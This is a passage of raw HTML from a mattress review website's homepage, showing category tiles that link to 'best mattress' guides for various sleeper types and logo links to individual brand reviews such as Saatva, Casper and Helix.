width="1100" height="53" srcset="https://www.sleepadvisor.org/wp-content/uploads/2018/02/featured-on-brands.png 1100w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/featured-on-brands-300x14.png 300w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/featured-on-brands-768x37.png 768w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/featured-on-brands-1024x49.png 1024w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/featured-on-brands-788x37.png 788w" sizes="(max-width: 1100px) 100vw, 1100px" /></noscript></p> </div> </article> </div></div></div></div></section><section data-vc-full-width="true" data-vc-full-width-init="false" class="vc_section categories vc_custom_1517915271076"><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper"> <article class="wpb_text_column wpb_content_element post vc_custom_1518006722458"> <div class="wpb_wrapper"> <h2 style="text-align: center;">Explore Individual Categories</h2> </div> </article> <div class="vc_separator wpb_content_element vc_separator_align_center vc_sep_width_10 vc_sep_border_width_2 vc_sep_pos_align_center vc_separator_no_text vc_custom_1518006507887 vc_custom_1518006507887"><span class="vc_sep_holder vc_sep_holder_l"><span style="border-color:#ec8d0f;" class="vc_sep_line"></span></span><span class="vc_sep_holder vc_sep_holder_r"><span style="border-color:#ec8d0f;" class="vc_sep_line"></span></span> </div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid vc_row-o-equal-height vc_row-flex"><div class="wpb_column vc_column_container vc_col-sm-9"><div class="vc_column-inner vc_custom_1516299613563"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid vc_custom_1516306772510"><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1516353306812"><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1516301408538"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border vc_box_border_white"><img width="788" height="594" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2018/01/best-memory-foam-mattresses-for-2018.jpg" class="vc_single_image-img attachment-full" alt="What is the ultimate memory foam mattress in 2019?" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2018/01/best-memory-foam-mattresses-for-2018.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/best-memory-foam-mattresses-for-2018-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/best-memory-foam-mattresses-for-2018-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/best-memory-foam-mattresses-for-2018-1024x772.jpg 1024w" data-lazy-sizes="(max-width: 788px) 100vw, 788px" /><noscript><img width="788" height="594" src="https://www.sleepadvisor.org/wp-content/uploads/2018/01/best-memory-foam-mattresses-for-2018.jpg" class="vc_single_image-img attachment-full" alt="What is the ultimate memory foam mattress in 2019?" srcset="https://www.sleepadvisor.org/wp-content/uploads/2018/01/best-memory-foam-mattresses-for-2018.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/best-memory-foam-mattresses-for-2018-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/best-memory-foam-mattresses-for-2018-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/best-memory-foam-mattresses-for-2018-1024x772.jpg 1024w" sizes="(max-width: 788px) 100vw, 788px" /></noscript></div> </figure> </div> <article class="wpb_text_column wpb_content_element post vc_custom_1518012785465"> <div class="wpb_wrapper"> <h3 style="text-align: center;"><span style="color: #ffffff; line-height: 1em;">Memory Foam Mattress</span></h3> </div> </article> <div class="vc_btn3-container vc_btn3-center vc_custom_1517838216837"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-round vc_btn3-style-modern vc_btn3-block vc_btn3-color-warning" href="https://www.sleepadvisor.org/best-memory-foam-mattress/" title="">Read More</a></div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1516353600475"><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1516301398814"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border vc_box_border_white"><img width="788" height="594" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2017/08/Best-Latex-Matresses.jpg" class="vc_single_image-img attachment-full" alt="Highest rated latex mattresses in 2017" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/08/Best-Latex-Matresses.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Best-Latex-Matresses-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Best-Latex-Matresses-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Best-Latex-Matresses-1024x772.jpg 1024w" data-lazy-sizes="(max-width: 788px) 100vw, 788px" /><noscript><img width="788" height="594" src="https://www.sleepadvisor.org/wp-content/uploads/2017/08/Best-Latex-Matresses.jpg" class="vc_single_image-img attachment-full" alt="Highest rated latex mattresses in 2017" srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/08/Best-Latex-Matresses.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Best-Latex-Matresses-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Best-Latex-Matresses-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Best-Latex-Matresses-1024x772.jpg 1024w" sizes="(max-width: 788px) 100vw, 788px" /></noscript></div> </figure> </div> <article class="wpb_text_column wpb_content_element post vc_custom_1518012811877"> <div class="wpb_wrapper"> <h3 style="text-align: center;"><span style="color: #ffffff; line-height: 1em;">Latex<br /> Mattress</span></h3> </div> </article> <div class="vc_btn3-container vc_btn3-center vc_custom_1517838234858"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-round vc_btn3-style-modern vc_btn3-block vc_btn3-color-warning" href="https://www.sleepadvisor.org/best-latex-mattress/" title="">Read More</a></div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1518013201145"><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1516301384141"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border vc_box_border_white"><img width="788" height="594" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2017/06/The-Best-Innerspring-Mattresses-featured.jpg" class="vc_single_image-img attachment-full" alt="Picture of the best innerspring mattress" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/06/The-Best-Innerspring-Mattresses-featured.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/06/The-Best-Innerspring-Mattresses-featured-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/06/The-Best-Innerspring-Mattresses-featured-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/06/The-Best-Innerspring-Mattresses-featured-1024x772.jpg 1024w" data-lazy-sizes="(max-width: 788px) 100vw, 788px" /><noscript><img width="788" height="594" src="https://www.sleepadvisor.org/wp-content/uploads/2017/06/The-Best-Innerspring-Mattresses-featured.jpg" class="vc_single_image-img attachment-full" alt="Picture of the best innerspring mattress" srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/06/The-Best-Innerspring-Mattresses-featured.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/06/The-Best-Innerspring-Mattresses-featured-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/06/The-Best-Innerspring-Mattresses-featured-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/06/The-Best-Innerspring-Mattresses-featured-1024x772.jpg 1024w" sizes="(max-width: 788px) 100vw, 788px" /></noscript></div> </figure> </div> <article class="wpb_text_column wpb_content_element post vc_custom_1518012829065"> <div class="wpb_wrapper"> <h3 style="text-align: center;"><span style="color: #ffffff; line-height: 1em;">Innerspring Mattress</span></h3> </div> </article> <div class="vc_btn3-container vc_btn3-center vc_custom_1517838263616"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-round vc_btn3-style-modern vc_btn3-block vc_btn3-color-warning" href="https://www.sleepadvisor.org/best-innerspring-mattress/" title="">Read More</a></div> </div></div></div></div><div class="vc_row wpb_row vc_inner vc_row-fluid vc_custom_1516301867656"><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1516353386517"><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1516301659983"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border vc_box_border_white"><img width="788" height="594" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2017/09/highest-rated-mattresses-for-side-sleepers.jpg" class="vc_single_image-img attachment-full" alt="highest rated mattresses for side sleepers reviewed" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/09/highest-rated-mattresses-for-side-sleepers.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/highest-rated-mattresses-for-side-sleepers-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/highest-rated-mattresses-for-side-sleepers-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/highest-rated-mattresses-for-side-sleepers-1024x772.jpg 1024w" data-lazy-sizes="(max-width: 788px) 100vw, 788px" /><noscript><img width="788" height="594" src="https://www.sleepadvisor.org/wp-content/uploads/2017/09/highest-rated-mattresses-for-side-sleepers.jpg" class="vc_single_image-img attachment-full" alt="highest rated mattresses for side sleepers reviewed" srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/09/highest-rated-mattresses-for-side-sleepers.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/highest-rated-mattresses-for-side-sleepers-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/highest-rated-mattresses-for-side-sleepers-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/highest-rated-mattresses-for-side-sleepers-1024x772.jpg 1024w" sizes="(max-width: 788px) 100vw, 788px" /></noscript></div> </figure> </div> <article class="wpb_text_column wpb_content_element post vc_custom_1518012852385"> <div class="wpb_wrapper"> <h3 style="text-align: center;"><span style="color: #ffffff; line-height: 1em;">Mattress for<br /> Side Sleepers</span></h3> </div> </article> <div class="vc_btn3-container vc_btn3-center vc_custom_1517838347964"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-round vc_btn3-style-modern vc_btn3-block vc_btn3-color-warning" href="https://www.sleepadvisor.org/best-mattress-for-side-sleepers/" title="">Read More</a></div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1516353576172"><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1516301681861"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border vc_box_border_white"><img width="788" height="594" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2017/04/best-mattresses-for-back-sleepers.jpg" class="vc_single_image-img attachment-full" alt="best mattresses for back sleepers" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/04/best-mattresses-for-back-sleepers.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/04/best-mattresses-for-back-sleepers-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/04/best-mattresses-for-back-sleepers-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/04/best-mattresses-for-back-sleepers-1024x772.jpg 1024w" data-lazy-sizes="(max-width: 788px) 100vw, 788px" /><noscript><img width="788" height="594" src="https://www.sleepadvisor.org/wp-content/uploads/2017/04/best-mattresses-for-back-sleepers.jpg" class="vc_single_image-img attachment-full" alt="best mattresses for back sleepers" srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/04/best-mattresses-for-back-sleepers.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/04/best-mattresses-for-back-sleepers-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/04/best-mattresses-for-back-sleepers-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/04/best-mattresses-for-back-sleepers-1024x772.jpg 1024w" sizes="(max-width: 788px) 100vw, 788px" /></noscript></div> </figure> </div> <article class="wpb_text_column wpb_content_element post vc_custom_1518012869943"> <div class="wpb_wrapper"> <h3 style="text-align: center;"><span style="color: #ffffff; line-height: 1em;">Mattress for<br /> Back Sleepers</span></h3> </div> </article> <div class="vc_btn3-container vc_btn3-center vc_custom_1517838372761"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-round vc_btn3-style-modern vc_btn3-block vc_btn3-color-warning" href="https://www.sleepadvisor.org/best-mattress-for-back-sleepers/" title="">Read More</a></div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1516353560545"><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1516301705322"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border vc_box_border_white"><img width="788" height="594" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2017/09/Top-Rated-Matterss-for-Stomach-Sleepers.jpg" class="vc_single_image-img attachment-full" alt="top rated mattress for stomach sleepers" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/09/Top-Rated-Matterss-for-Stomach-Sleepers.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/Top-Rated-Matterss-for-Stomach-Sleepers-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/Top-Rated-Matterss-for-Stomach-Sleepers-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/Top-Rated-Matterss-for-Stomach-Sleepers-1024x772.jpg 1024w" data-lazy-sizes="(max-width: 788px) 100vw, 788px" /><noscript><img width="788" height="594" src="https://www.sleepadvisor.org/wp-content/uploads/2017/09/Top-Rated-Matterss-for-Stomach-Sleepers.jpg" class="vc_single_image-img attachment-full" alt="top rated mattress for stomach sleepers" srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/09/Top-Rated-Matterss-for-Stomach-Sleepers.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/Top-Rated-Matterss-for-Stomach-Sleepers-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/Top-Rated-Matterss-for-Stomach-Sleepers-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/09/Top-Rated-Matterss-for-Stomach-Sleepers-1024x772.jpg 1024w" sizes="(max-width: 788px) 100vw, 788px" /></noscript></div> </figure> </div> <article class="wpb_text_column wpb_content_element post vc_custom_1518012889630"> <div class="wpb_wrapper"> <h3 style="text-align: center;"><span style="color: #ffffff; line-height: 1em;">Mattress for<br /> Stomach Sleepers</span></h3> </div> </article> <div class="vc_btn3-container vc_btn3-center vc_custom_1517838393943"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-round vc_btn3-style-modern vc_btn3-block vc_btn3-color-warning" href="https://www.sleepadvisor.org/best-mattress-for-stomach-sleepers/" title="">Read More</a></div> </div></div></div></div><div class="vc_row wpb_row vc_inner vc_row-fluid vc_custom_1516306889721"><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1516353498560"><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1516301774725"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border vc_box_border_white"><img width="788" height="594" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2017/08/Highest-Rated-mattresses-for-sex.jpg" class="vc_single_image-img attachment-full" alt="Highest Rated mattresses for sex reviewed" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/08/Highest-Rated-mattresses-for-sex.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Highest-Rated-mattresses-for-sex-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Highest-Rated-mattresses-for-sex-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Highest-Rated-mattresses-for-sex-1024x772.jpg 1024w" data-lazy-sizes="(max-width: 788px) 100vw, 788px" /><noscript><img width="788" height="594" src="https://www.sleepadvisor.org/wp-content/uploads/2017/08/Highest-Rated-mattresses-for-sex.jpg" class="vc_single_image-img attachment-full" alt="Highest Rated mattresses for sex reviewed" srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/08/Highest-Rated-mattresses-for-sex.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Highest-Rated-mattresses-for-sex-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Highest-Rated-mattresses-for-sex-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/08/Highest-Rated-mattresses-for-sex-1024x772.jpg 1024w" sizes="(max-width: 788px) 100vw, 788px" /></noscript></div> </figure> </div> <article class="wpb_text_column wpb_content_element post vc_custom_1518012911831"> <div class="wpb_wrapper"> <h3 style="text-align: center;"><span style="color: #ffffff; line-height: 1em;">Mattress for<br /> Sex</span></h3> </div> </article> <div class="vc_btn3-container vc_btn3-center vc_custom_1517838416175"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-round vc_btn3-style-modern vc_btn3-block vc_btn3-color-warning" href="https://www.sleepadvisor.org/best-mattress-for-sex/" title="">Read More</a></div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1516353541291"><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1537775807965"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border vc_box_border_white"><img width="788" height="594" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2017/07/our-top-rated-beds-for-couples.jpg" class="vc_single_image-img attachment-full" alt="our top rated beds for couples" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/07/our-top-rated-beds-for-couples.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/our-top-rated-beds-for-couples-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/our-top-rated-beds-for-couples-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/our-top-rated-beds-for-couples-1024x772.jpg 1024w" data-lazy-sizes="(max-width: 788px) 100vw, 788px" /><noscript><img width="788" height="594" src="https://www.sleepadvisor.org/wp-content/uploads/2017/07/our-top-rated-beds-for-couples.jpg" class="vc_single_image-img attachment-full" alt="our top rated beds for couples" srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/07/our-top-rated-beds-for-couples.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/our-top-rated-beds-for-couples-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/our-top-rated-beds-for-couples-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/our-top-rated-beds-for-couples-1024x772.jpg 1024w" sizes="(max-width: 788px) 100vw, 788px" /></noscript></div> </figure> </div> <article class="wpb_text_column wpb_content_element post vc_custom_1518012930246"> <div class="wpb_wrapper"> <h3 style="text-align: center;"><span style="color: #ffffff; line-height: 1em;">Mattress for<br /> Couples</span></h3> </div> </article> <div class="vc_btn3-container vc_btn3-center vc_custom_1517838437310"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-round vc_btn3-style-modern vc_btn3-block vc_btn3-color-warning" href="https://www.sleepadvisor.org/best-mattress-for-couples/" title="">Read More</a></div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1516353527685"><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1516301819988"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border vc_box_border_white"><img width="788" height="594" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2017/07/highest-rated-mattresses-for-heavy-people.jpg" class="vc_single_image-img attachment-full" alt="Highest Rated Mattresses For Heavy People" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/07/highest-rated-mattresses-for-heavy-people.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/highest-rated-mattresses-for-heavy-people-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/highest-rated-mattresses-for-heavy-people-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/highest-rated-mattresses-for-heavy-people-1024x772.jpg 1024w" data-lazy-sizes="(max-width: 788px) 100vw, 788px" /><noscript><img width="788" height="594" src="https://www.sleepadvisor.org/wp-content/uploads/2017/07/highest-rated-mattresses-for-heavy-people.jpg" class="vc_single_image-img attachment-full" alt="Highest Rated Mattresses For Heavy People" srcset="https://www.sleepadvisor.org/wp-content/uploads/2017/07/highest-rated-mattresses-for-heavy-people.jpg 788w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/highest-rated-mattresses-for-heavy-people-300x226.jpg 300w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/highest-rated-mattresses-for-heavy-people-767x578.jpg 767w, https://www.sleepadvisor.org/wp-content/uploads/2017/07/highest-rated-mattresses-for-heavy-people-1024x772.jpg 1024w" sizes="(max-width: 788px) 100vw, 788px" /></noscript></div> </figure> </div> <article class="wpb_text_column wpb_content_element post vc_custom_1518012948358"> <div class="wpb_wrapper"> <h3 style="text-align: center;"><span style="color: #ffffff; line-height: 1em;">Mattress for<br /> Heavy People</span></h3> </div> </article> <div class="vc_btn3-container vc_btn3-center vc_custom_1517838453310"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-round vc_btn3-style-modern vc_btn3-block vc_btn3-color-warning" href="https://www.sleepadvisor.org/best-mattress-for-heavy-people/" title="">Read More</a></div> </div></div></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-3"><div class="vc_column-inner"><div class="wpb_wrapper"> <article class="wpb_text_column wpb_content_element post vc_custom_1518014406578"> <div class="wpb_wrapper"> <h2 style="text-align: center;">In-Depth<br /> Reviews</h2> </div> </article> <div class="vc_separator wpb_content_element vc_separator_align_center vc_sep_width_10 vc_sep_border_width_2 vc_sep_pos_align_center vc_separator_no_text vc_custom_1518014121428 vc_custom_1518014121428"><span class="vc_sep_holder vc_sep_holder_l"><span style="border-color:#ec8d0f;" class="vc_sep_line"></span></span><span class="vc_sep_holder vc_sep_holder_r"><span style="border-color:#ec8d0f;" class="vc_sep_line"></span></span> </div> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1518016178895"> <figure class="wpb_wrapper vc_figure"> <a href="https://www.sleepadvisor.org/saatva-mattress-review/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="150" height="76" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage.png" class="vc_single_image-img attachment-full" alt="logo saatva homepage" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage.png 150w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage-300x152.png 300w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage-768x389.png 768w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage-1024x519.png 1024w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage-788x399.png 788w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" /><noscript><img width="150" height="76" src="https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage.png" class="vc_single_image-img attachment-full" alt="logo saatva homepage" srcset="https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage.png 150w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage-300x152.png 300w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage-768x389.png 768w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage-1024x519.png 1024w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-saatva-homepage-788x399.png 788w" sizes="(max-width: 150px) 100vw, 150px" /></noscript></a> </figure> </div> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1518016217732"> <figure class="wpb_wrapper vc_figure"> <a href="https://www.sleepadvisor.org/alexander-nest-hybrid-mattress-review/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="150" height="76" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage.png" class="vc_single_image-img attachment-full" alt="logo nest bedding homepage" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage.png 150w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage-300x152.png 300w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage-768x389.png 768w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage-1024x519.png 1024w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage-788x399.png 788w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" /><noscript><img width="150" height="76" src="https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage.png" class="vc_single_image-img attachment-full" alt="logo nest bedding homepage" srcset="https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage.png 150w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage-300x152.png 300w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage-768x389.png 768w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage-1024x519.png 1024w, https://www.sleepadvisor.org/wp-content/uploads/2018/02/logo-nest-bedding-homepage-788x399.png 788w" sizes="(max-width: 150px) 100vw, 150px" /></noscript></a> </figure> </div> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1518016305679"> <figure class="wpb_wrapper vc_figure"> <a href="https://www.sleepadvisor.org/casper-mattress-review/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="150" height="76" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" data-lazy-src="https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage.png" class="vc_single_image-img attachment-full" alt="logo casper homepage" data-lazy-srcset="https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage.png 150w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage-300x152.png 300w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage-768x389.png 768w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage-1024x519.png 1024w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage-788x399.png 788w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" /><noscript><img width="150" height="76" src="https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage.png" class="vc_single_image-img attachment-full" alt="logo casper homepage" srcset="https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage.png 150w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage-300x152.png 300w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage-768x389.png 768w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage-1024x519.png 1024w, https://www.sleepadvisor.org/wp-content/uploads/2018/01/logo-casper-homepage-788x399.png 788w" sizes="(max-width: 150px) 100vw, 150px" /></noscript></a> </figure> </div> <div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1518016361503"> <figure class="wpb_wrapper vc_figure"> <a href="https://www.sleepadvisor.org/helix-sleep-mattress-review/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="150" height="76" src="data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=" 